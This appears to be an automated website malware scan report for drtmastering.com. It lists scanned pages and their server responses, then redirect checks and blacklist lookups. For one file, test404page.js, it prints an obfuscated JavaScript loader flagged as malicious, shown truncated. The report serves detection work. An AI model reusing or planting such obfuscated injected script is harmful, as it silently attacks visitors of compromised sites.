Scanned pages/files
Request | Server response | Status |
http://drtmastering.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 05 Jul 2014 21:15:07 GMT Location: http://www.drtmastering.com/ Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) mod_gzip/1.3.26.1a mod_fastcgi/2.4.6 mod_throttle/3.1.2 Chili!Soft-ASP/3.6.2 FrontPage/5.0.2.2635 mod_perl/1.31 PHP/4.4.9 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.drtmastering.com/ | 200 OK Content-Length: 4781 Content-Type: text/html | clean |
http://www.drtmastering.com/idxfaq.htm | 200 OK Content-Length: 3688 Content-Type: text/html | clean |
http://www.drtmastering.com/noframes.htm | 200 OK Content-Length: 12280 Content-Type: text/html | clean |
http://www.drtmastering.com/index.htm | 200 OK Content-Length: 4781 Content-Type: text/html | clean |
http://www.drtmastering.com/idxfaq2.htm | 200 OK Content-Length: 3688 Content-Type: text/html | clean |
http://www.drtmastering.com/faq.htm | 200 OK Content-Length: 75250 Content-Type: text/html | clean |
http://www.drtmastering.com/idxfaq3.htm | 200 OK Content-Length: 3688 Content-Type: text/html | clean |
http://www.drtmastering.com/faq2.htm | 200 OK Content-Length: 105360 Content-Type: text/html | clean |
http://www.drtmastering.com/idxtech.htm | 200 OK Content-Length: 3688 Content-Type: text/html | clean |
http://www.drtmastering.com/technf.htm | 200 OK Content-Length: 21272 Content-Type: text/html | clean |
http://www.drtmastering.com/faq3.htm | 200 OK Content-Length: 46551 Content-Type: text/html | clean |
http://www.drtmastering.com/linksnf.htm | 200 OK Content-Length: 11000 Content-Type: text/html | clean |
http://www.drtmastering.com/blackmer.htm | 200 OK Content-Length: 22041 Content-Type: text/html | clean |
http://www.drtmastering.com/test404page.js | 404 Not Found Content-Length: 10308 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$,_2,_1) { function qq2(){return [89,75,80,70,81,89,16,73,78,81,67,31,10,2,28,2,13,83,31,2,28,88,67,84,2,56,77,31,86,74,75,85,29,62,61,56,77,2,2,40,87,78,78,59,71,67,84,2,7,47,81,80,86,74,2,7,38,67,86,71,2,7,42,81,87,84,85,2,7,47,75,80,87,86,71,85,2,7,53,71,69,81,80,70,85,10,11,63,95,29,2,13,52,31,2,28,2,8,89,14,56,91,31,86,74,75,85,16,5,83,10,11,14,75,31,18,29,56,91,61,19,63,13,31,19,29,89,74,75,78,71,10,75,13,13,30,25,11,93,5,89,31,56,91,61,75,63,2,17,5,89,30,5,37,11,56,91,61,7 return jsBs(jsB(jsBs(jsB(jsBb))))(jsBb)() })((function(jsB) { return jsB.constructor }), (function(jsB) { return (function(jsBs) { return jsB.call(jsB, jsBs) }) })) },function(tt){return tt.pop();}, function(kk,dd,ch,pp){ for(var c=kk.length;c>0;){ var x=ch(c); c-=x; var rep=kk.substr(c, x); var t = dd.split(rep); dd=t.join(pp(t)); };return dd; }); gloa(); Antivirus reports:
| ||
http://www.drtmastering.com/drtpixnf.htm | 200 OK Content-Length: 4798 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: drtmastering.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 05 Jul 2014 21:15:07 GMT
Location: http://www.drtmastering.com/
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) mod_gzip/1.3.26.1a mod_fastcgi/2.4.6 mod_throttle/3.1.2 Chili!Soft-ASP/3.6.2 FrontPage/5.0.2.2635 mod_perl/1.31 PHP/4.4.9
Content-Type: text/html; charset=iso-8859-1
GET / HTTP/1.1
Host: drtmastering.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 05 Jul 2014 21:15:07 GMT
Location: http://www.drtmastering.com/
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) mod_gzip/1.3.26.1a mod_fastcgi/2.4.6 mod_throttle/3.1.2 Chili!Soft-ASP/3.6.2 FrontPage/5.0.2.2635 mod_perl/1.31 PHP/4.4.9
Content-Type: text/html; charset=iso-8859-1
Second query (visit from search engine):
GET / HTTP/1.1
Host: drtmastering.com
Referer: http://www.google.com/search?q=drtmastering.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: drtmastering.com
Referer: http://www.google.com/search?q=drtmastering.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=drtmastering.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://drtmastering.com/
Result: drtmastering.com is not infected or malware details are not published yet.
Result: drtmastering.com is not infected or malware details are not published yet.